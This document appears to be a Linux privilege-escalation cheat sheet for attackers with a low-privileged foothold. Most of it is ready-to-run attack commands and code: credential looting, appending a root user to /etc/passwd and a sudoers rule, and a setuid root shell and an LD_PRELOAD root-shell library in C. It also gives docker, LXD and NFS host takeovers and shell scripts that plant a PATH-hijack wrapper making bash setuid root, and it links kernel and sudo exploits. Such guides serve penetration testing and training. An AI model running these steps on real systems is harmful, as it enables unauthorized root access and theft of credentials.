Privilege escalation - Linux
By VeryLazyTech. Follow on Twitter, GitHub, Medium, YouTube and Telegram: @VeryLazyTech.
Privilege escalation is the post-exploitation step in which an attacker turns a low-privileged foothold into higher privileges, usually root. This guide collects practical commands for finding and exploiting Linux privilege escalation paths: enumeration tools, hunting for credentials, abusing misconfigurations (PATH, cron, SUID, capabilities, sudo, writable system files, containers) and known kernel and sudo bugs. Each method comes with the command to run.
Tools
These tools are essential for finding and exploiting privilege escalation vulnerabilities:
LinPEAS: privilege escalation auditing script.
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Linux Exploit Suggester: suggests kernel exploits matching the running kernel version and distribution.
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh
Pspy: watches processes and cron activity of other users without root access (useful for spotting scheduled jobs that run as root).
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod +x pspy64
./pspy64
Checklist
System information:
Gather system information:
uname -a
cat /etc/*release
id
Check running processes:
ps aux
Check the kernel version (feed it to the Kernel Exploits section below):
uname -r
List users on the system:
cat /etc/passwd
Check available shell history (other shells and tools keep their own files, e.g. ~/.zsh_history, ~/.mysql_history, ~/.python_history):
cat ~/.bash_history
ls -la ~/.*history 2>/dev/null
PATH Variable & Writable Folders
Check whether any directory in the PATH is writable by you: a root-run script that calls a command without an absolute path can then be hijacked by a same-named file in that directory. Test writability directly rather than grepping ls output (a "w" in the mode string may be the owner's bit, not yours):
echo $PATH
for d in $(echo "$PATH" | tr ':' '\n'); do [ -w "$d" ] && echo "writable: $d"; done
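As an added example (not from the original page), a small shell helper that lists the PATH entries you can write to, treating an empty entry as the current directory the way the shell does, plus a function that plants a wrapper named after a command a root job calls without a full path. The demo PATH, its temporary directories and the command name backup are constructed for illustration.

```shell
#!/bin/bash
# Added example: enumerate writable PATH entries and plant a PATH-hijack wrapper.
# Directory names and the hijacked command name ("backup") are assumptions for the demo.

# Print each directory of a PATH-style string ($1, default $PATH) that the current user can write.
# An empty entry (leading, trailing or double colon) means "current directory" to the shell,
# so it is reported as "." when the cwd is writable.
writable_path_dirs() {
    path="${1-$PATH}"
    printf '%s\n' "$path" | tr ':' '\n' | while IFS= read -r dir; do
        if [ -z "$dir" ]; then dir="."; fi
        if [ -d "$dir" ] && [ -w "$dir" ]; then
            printf '%s\n' "$dir"
        fi
    done
    return 0
}

# Write a wrapper script named $2 into directory $1. If a privileged job calls "$2" without an
# absolute path and $1 precedes the real binary in its PATH, the wrapper runs as that job's user.
# The payload copies bash and makes it setuid root: run /tmp/rootbash -p afterwards.
plant_path_hijack() {
    out="$1/$2"
    cat > "$out" <<'EOF'
#!/bin/sh
cp /bin/bash /tmp/rootbash && chmod 4755 /tmp/rootbash
EOF
    chmod 755 "$out"
    printf '%s\n' "$out"
}

# Demo on a constructed PATH made of temporary directories (removed afterwards).
demo=$(mktemp -d)
mkdir -p "$demo/bin" "$demo/sbin"
chmod 555 "$demo/sbin"                       # read-only for a non-root user
writable_path_dirs "$demo/sbin:$demo/bin:/usr/bin"
plant_path_hijack "$demo/bin" backup
rm -rf "$demo"
```

On a real target, run writable_path_dirs with no argument, then confirm with pspy which root job calls what; the wrapper only fires if the job's PATH (often set in /etc/crontab, not your own) searches your directory before the real binary.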
Environment Variables
Check environment variables for sensitive information:
env
Kernel Exploits
Run Linux Exploit Suggester against the running kernel; it lists candidate exploits (DirtyCow and the like on old kernels):
./linux-exploit-suggester.sh
Reference for a specific kernel exploit such as DirtyCow (CVE-2016-5195):
https://github.com/dirtycow/dirtycow.github.io
Check the sudo version too; sudo has had its own root bugs (CVE-2019-14287 below, sudo before 1.8.28; CVE-2021-3156 "Baron Samedit", sudo before 1.9.5p2):
sudo -V | head -n1
Dmesg: Signature Verification Failed
Look for kernel messages about failed signature verification (unsigned or tampered modules, Secure Boot state). Reading dmesg may require root when kernel.dmesg_restrict=1:
dmesg | grep -i signature
More System Enumeration
Check System Information (Date, System Stats, CPU Info)
Date and Time: (Helps you synchronize your actions with scheduled jobs or detect potential time-based misconfigurations)
date
CPU info: (Identifies the system architecture to tailor exploits to the specific processor type)
cat /proc/cpuinfo
Check for printers: (Identifies networked printers, which could be exploited for lateral movement or sensitive data interception)
lpstat -p
Check for writable files outside /proc (a writable root-owned script, config or unit file is often the way in):
find / -writable -type f -not -path "/proc/*" 2>/dev/null
Looting for Passwords
Files Containing Passwords
Grep system configuration for credentials (case-insensitive, so one run covers password, PASSWORD and Password):
grep -ri "password" /etc/ 2>/dev/null
Old Passwords in /etc/security/opasswd (kept by pam_unix's remember option; readable by root only, so check it from any account you gain)
cat /etc/security/opasswd
Last Edited Files
find / -type f -not -path "/proc/*" -not -path "/sys/*" -printf '%TY-%Tm-%Td %TT %p\n' 2>/dev/null | sort -r | head
In-Memory Passwords
Search raw memory for passwords. This needs root, and CONFIG_STRICT_DEVMEM (default on most distributions) blocks reads of RAM pages through /dev/mem, so it rarely works on modern systems; memory of processes you own can be read through /proc/<pid>/mem instead:
strings /dev/mem | grep -i password
Find Sensitive Files
SSH Key
Search for SSH private keys of any type, and for authorized_keys files you might be able to append to:
find / \( -name "id_rsa" -o -name "id_ed25519" -o -name "id_ecdsa" -o -name "id_dsa" -o -name "authorized_keys" \) 2>/dev/null
Scheduled Tasks
Cron Jobs
Check cron jobs:
cat /etc/crontab
ls -la /etc/cron.*
ls -la /var/spool/cron/crontabs
If a cron job that runs as root executes a script or binary you can write to (or calls a command without an absolute path while a PATH directory is writable), append your own commands to it and wait for the next run. Use pspy to see jobs whose definitions you cannot read.
Systemd Timers
List systemd timers and the services they trigger; a timer is exploitable when you can write to the .service unit or to the ExecStart target it runs:
systemctl list-timers --all
systemctl cat <timer-name>.service
SUID
Find SUID Binaries (https://gtfobins.github.io/)
SUID binaries run as their owner (root, if root-owned) regardless of who starts them; check each unusual one against GTFOBins, and list SGID ones too:
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null
Create a SUID Binary
A root-owned file with the setuid bit runs with euid 0 whoever executes it. You cannot create one as an unprivileged user (chown to root needs root, and writing to a setuid file strips the bit), so this is for the cases where a root-run job copies or chmods a file you control, or for keeping root once you have it:
#include <stdlib.h>
#include <unistd.h>
int main(void) {
    /* euid is already 0 thanks to the setuid bit; make ruid and gid 0 too so the
       spawned shell keeps root instead of dropping back to the caller's uid */
    setgid(0);
    setuid(0);
    system("/bin/bash");
    return 0;
}
Compile, hand it to root and set the setuid bit (both steps need root):
gcc -o suid_binary suid_binary.c
chown root:root suid_binary
chmod 4755 suid_binary
Capabilities
List Capabilities of Binaries
Linux capabilities allow binaries to perform privileged operations:
getcap -r / 2>/dev/null
Edit Capabilities
Assigning a capability needs root (CAP_SETFCAP), so this is for a root-run job that runs setcap on a file you control, or for persistence once you are root. Overwriting a capability-bearing binary in place does not help: the kernel clears file capabilities on write, just as it clears the setuid bit.
setcap cap_setuid+ep /path/to/binary
Interesting Capabilities
Look for binaries with capabilities such as cap_setuid (call setuid(0) and spawn a shell, e.g. from a python or perl interpreter that carries it), cap_dac_override (write any file, e.g. /etc/passwd), cap_dac_read_search (read any file, e.g. /etc/shadow) or cap_sys_admin (mount, enter namespaces). Only the effective form (+ep or =ep) is directly usable; a permitted-only capability must be raised by the program itself.
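As an added example (not from the original page), a filter for getcap -r / output that surfaces the capabilities listed above and copes with both output formats libcap has used (older: "/path = cap_x+ep"; libcap 2.41 and later: "/path cap_x=ep"), plus the one-liner for a python interpreter carrying cap_setuid. The sample getcap lines are constructed, and the set of capabilities treated as dangerous is an assumption you can extend.

```shell
#!/bin/bash
# Added example: pick the dangerous entries out of `getcap -r /` output, whichever libcap
# output format it uses. Sample lines are constructed; DANGEROUS_CAPS is an assumption.

DANGEROUS_CAPS="cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_sys_admin cap_sys_ptrace cap_sys_module cap_setfcap cap_chown cap_fowner"

# Path and capability string of one getcap line, for both formats.
getcap_path() { case "$1" in *" = "*) printf '%s\n' "${1%% = *}" ;; *) printf '%s\n' "${1%% *}" ;; esac; }
getcap_caps() { case "$1" in *" = "*) printf '%s\n' "${1#* = }" ;; *) printf '%s\n' "${1#* }" ;; esac; }

# Read getcap output on stdin; print "path<TAB>capability" for each dangerous capability named
# in the line (effective or permitted; check the +ep/=ep flags in the original line yourself).
interesting_caps() {
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        path=$(getcap_path "$line")
        caps=$(getcap_caps "$line" | tr ' ' ',')    # several cap sets may be space-separated
        for cap in $DANGEROUS_CAPS; do
            case ",$caps" in
                *",$cap="*|*",$cap+"*|*",$cap,"*) printf '%s\t%s\n' "$path" "$cap" ;;
            esac
        done
    done
    return 0
}

# Root shell from an interpreter that carries cap_setuid: set real and effective uid to 0,
# then start bash (no -p needed because the real uid is 0 as well).
cap_setuid_python_shell() {
    printf "%s -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'\n" "$1"
}

# Constructed sample mixing both getcap output formats, as seen across distributions.
sample_getcap='/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
/usr/bin/vim.basic cap_dac_override=ep'
printf '%s\n' "$sample_getcap" | interesting_caps
cap_setuid_python_shell /usr/bin/python3.8
```

On a target: getcap -r / 2>/dev/null | interesting_caps. The exact-name patterns matter: a plain substring test would also fire on unrelated names that merely contain another capability's name.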
SUDO
NOPASSWD
List the sudo rules you can use, especially NOPASSWD ones, then check each permitted binary on GTFOBins for a shell escape:
sudo -l
LD_PRELOAD and NOPASSWD
If sudo -l shows env_keep+=LD_PRELOAD, sudo passes LD_PRELOAD through to the command it runs as root. A preloaded library's constructor executes inside that root process before main, so it can drop the variable, set uid and gid to 0 and spawn a shell, whatever the permitted command is:
echo '#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(void) { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash -p"); }' > preload.c
gcc -fPIC -shared -o preload.so preload.c
sudo LD_PRELOAD=$PWD/preload.so /path/to/allowed_command
Doas
Doas is an OpenBSD-style alternative to sudo. Check whether it is installed and what /etc/doas.conf permits (look for permit nopass rules matching your user or group), then use it:
cat /etc/doas.conf
doas -s
Writable Files
Writable /etc/passwd
If /etc/passwd is writable, append a new uid-0 user with a password hash in the second field (an x there would point to /etc/shadow, which you cannot edit, so the login would fail), then switch to it (use your own password in place of Pass123):
echo "hacker:$(openssl passwd -6 'Pass123'):0:0:hacker:/root:/bin/bash" >> /etc/passwd
su hacker
Writable /etc/sudoers
If writable, add a rule for your user, then check the syntax: a malformed sudoers breaks sudo for everyone:
echo 'hacker ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers
visudo -c
NFS Root Squashing
By default NFS maps a client's uid 0 to nobody (root_squash). If an export is configured with no_root_squash, files you create as root from your own machine stay owned by root on the server, so you can drop a setuid-root binary into the share and run it from your low-privileged shell on the target. On the target read /etc/exports; from your machine list the exports, mount the share as root and plant a setuid shell:
cat /etc/exports
showmount -e nfs_server
mount -o rw,vers=3 nfs_server:/share /mnt
cp /bin/bash /mnt/rootbash && chmod 4755 /mnt/rootbash
Then, on the target, run /share/rootbash -p. The planted binary must match the target's architecture and libc; a statically linked setuid shell avoids the libc mismatch.
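An added example (not part of the original page) that scans /etc/exports-style text for exports that disable root squashing, then prints the attacker-side steps for a given server and export. The exports text, the server address 10.0.0.10 and the mount point /mnt/nfs are constructed placeholders; nothing here contacts a server.

```shell
#!/bin/bash
# Added example: find NFS exports with no_root_squash and lay out the root-shell steps.
# The exports text, server 10.0.0.10 and mount point /mnt/nfs are constructed placeholders.

# Read /etc/exports lines on stdin; print "path<TAB>client" for every client entry that carries
# no_root_squash (the default is root_squash, so only the explicit option counts).
unsquashed_exports() {
    set -f                                   # keep "*" client specs from globbing
    while IFS= read -r line; do
        line=${line%%#*}                     # drop comments
        set -- $line                         # $1 = export path, rest = client(options) entries
        [ $# -ge 2 ] || continue
        path=$1; shift
        for entry in "$@"; do
            client=${entry%%\(*}
            opts=${entry#*\(}; opts=${opts%\)}
            case ",$opts," in
                *,no_root_squash,*) printf '%s\t%s\n' "$path" "$client" ;;
            esac
        done
    done
    set +f
    return 0
}

# Attacker-side steps (run as root on your own machine; needs an NFS client and a reachable
# server). Printed, not executed: there is no live server in this demo. The planted binary must
# match the target's architecture and libc; a statically linked setuid shell avoids the libc issue.
nfs_root_shell_steps() {
    server=$1; export_path=$2; mnt=${3:-/mnt/nfs}
    cat <<EOF
showmount -e $server
mkdir -p $mnt
mount -t nfs -o rw,vers=3,nolock $server:$export_path $mnt
cp /bin/bash $mnt/rootbash      # written as uid 0; no_root_squash keeps it owned by root
chmod 4755 $mnt/rootbash
# then, from the low-privileged shell on the target:
$export_path/rootbash -p
EOF
}

# Constructed /etc/exports: one export open to everyone without squashing, one where only a
# single client is unsquashed, one read-only.
sample_exports='# constructed /etc/exports
/srv/share      *(rw,sync,no_root_squash,no_subtree_check)
/home/shared    10.0.0.0/24(rw,sync) 10.0.0.5(rw,no_root_squash)
/var/backups    *(ro,sync)'
printf '%s\n' "$sample_exports" | unsquashed_exports
nfs_root_shell_steps 10.0.0.10 /srv/share
```

The per-client parsing is what matters in practice: an export can be squashed for the subnet and unsquashed for one host, and showmount -e does not show options at all, so the server-side /etc/exports (or a copy found while looting) is the authoritative source.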
Shared Library Exploits
ldconfig
ldconfig -p shows the shared library cache. What you want is a directory listed in /etc/ld.so.conf or /etc/ld.so.conf.d/*.conf that you can write to: a library you place there under the name a setuid binary expects (see ldd or the NEEDED entries of readelf -d) is loaded as root once root refreshes the cache with ldconfig and the cache maps that name to your directory (order in ld.so.conf matters):
ldconfig -p
cat /etc/ld.so.conf /etc/ld.so.conf.d/*.conf
for d in $(cat /etc/ld.so.conf.d/*.conf 2>/dev/null); do [ -w "$d" ] && echo "writable: $d"; done
RPATH
RPATH and RUNPATH are library search paths baked into a binary. If a setuid binary carries one that points to a directory you can write (or a missing directory under a writable parent), a malicious library with the expected name is loaded with root privileges. glibc restricts $ORIGIN expansion for setuid programs, so entries that depend on it usually do not help there. Check with:
readelf -d /path/to/binary | grep -E 'RPATH|RUNPATH|NEEDED'
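As an added example (not from the page), a helper that pulls the RPATH/RUNPATH directories out of readelf -d output, expands $ORIGIN relative to the binary's location and reports the ones you can write to or create. The readelf fragment and the /opt/app paths are constructed.

```shell
#!/bin/bash
# Added example: find hijackable RPATH/RUNPATH directories from `readelf -d` output.
# The readelf fragment and the /opt/app paths below are constructed for the demo.

# Read `readelf -d <binary>` output on stdin; print the RPATH/RUNPATH directories one per line,
# with $ORIGIN / ${ORIGIN} (the directory holding the binary, $1) expanded.
rpath_dirs() {
    bin_dir=$(dirname "$1")
    sed -n 's/.*(R\(UN\)*PATH).*\[\(.*\)\]/\2/p' | tr ':' '\n' | while IFS= read -r d; do
        [ -n "$d" ] || continue
        case "$d" in
            '$ORIGIN'*)   d="$bin_dir${d#\$ORIGIN}" ;;
            '${ORIGIN}'*) d="$bin_dir$(printf '%s' "$d" | cut -c10-)" ;;   # strip the 9-char ${ORIGIN}
        esac
        printf '%s\n' "$d"
    done
    return 0
}

# Print the search dirs where a planted library would be picked up: writable existing dirs, and
# missing dirs whose parent is writable (you can create them). Paths are not normalised, so
# "bin/../lib" is reported as written.
writable_rpath_dirs() {
    rpath_dirs "$1" | while IFS= read -r d; do
        if [ -d "$d" ]; then
            if [ -w "$d" ]; then printf '%s\n' "$d"; fi
        elif [ -w "$(dirname "$d")" ]; then
            printf '%s (missing, parent writable)\n' "$d"
        fi
    done
    return 0
}

# Constructed fragment of `readelf -d /opt/app/bin/server` output.
sample_readelf='Dynamic section at offset 0x2d80 contains 28 entries:
  Tag        Type                         Name/Value
 0x0000000000000001 (NEEDED)             Shared library: [libcrypto.so.3]
 0x000000000000001d (RUNPATH)            Library runpath: [/opt/app/lib:$ORIGIN/../lib]
 0x000000000000000c (INIT)               0x1000'
printf '%s\n' "$sample_readelf" | rpath_dirs /opt/app/bin/server
printf '%s\n' "$sample_readelf" | writable_rpath_dirs /opt/app/bin/server
```

On a target: readelf -d /path/to/binary | writable_rpath_dirs /path/to/binary. The library you plant must export the symbols the binary resolves from the real one (the NEEDED name tells you which), or it must do its work in a constructor and exec a shell before the missing symbols matter.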
Docker and LXC/LXD
Docker
If the user is in the docker group, or can write to /var/run/docker.sock, they can mount the host filesystem into a container and chroot into it as root:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
LXC/LXD
Members of the lxd group can start a privileged container with the host filesystem mounted. Import an image you brought along (a minimal Alpine rootfs tarball works; run lxd init --auto first if LXD has no storage pool yet), attach the host root as a disk device and exec a shell:
lxc image import ./rootfs.tar.xz --alias privesc
lxc init privesc privesc-container -c security.privileged=true
lxc config device add privesc-container host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc-container
lxc exec privesc-container /bin/sh
The host's filesystem is then under /mnt/root inside the container, writable as root (add a setuid shell or a sudoers rule there).
Hijack TMUX Session
tmux ls only shows sessions on your own socket. A root session is reachable only if you can access its socket (default /tmp/tmux-0/default, normally mode 700, so this needs a misconfiguration such as a root session started with -S on a world-accessible socket). Look for sockets and attach through -S:
ls -la /tmp/tmux-*/ 2>/dev/null
find / -type s -path "*tmux*" 2>/dev/null
tmux -S /path/to/socket ls
tmux -S /path/to/socket attach -t <session-id>
Kernel Exploits
CVE-2022-0847 (DirtyPipe)
Affects kernels 5.8 up to the fixes in 5.16.11, 5.15.25 and 5.10.102; lets an unprivileged user overwrite data in read-only files, e.g. to put a known password hash into /etc/passwd or patch a setuid binary:
https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit
CVE-2016-5195 (DirtyCow)
Affects kernels from 2.6.22 until the fixes in 4.8.3, 4.7.9 and 4.4.26 (October 2016); a race in copy-on-write handling that lets you write to read-only files such as /etc/passwd or setuid binaries:
https://github.com/dirtycow/dirtycow.github.io
CVE-2010-3904 (RDS)
RDS socket vulnerability:
https://www.exploit-db.com/exploits/15285
CVE-2010-4258 (Full Nelson)
Full Nelson exploit for privilege escalation:
https://www.exploit-db.com/exploits/15704
CVE-2019-14287 (a sudo bug, not a kernel one)
sudo before 1.8.28 mishandles the user id -1: when a sudoers rule lets you run a command as any user except root (e.g. user ALL=(ALL, !root) /bin/bash), asking for uid -1 runs it as root:
sudo -u#-1 /bin/bash
CVE-2012-0056 (Mempodipper)
Mempodipper is a kernel exploit for privilege escalation:
https://www.exploit-db.com/exploits/18411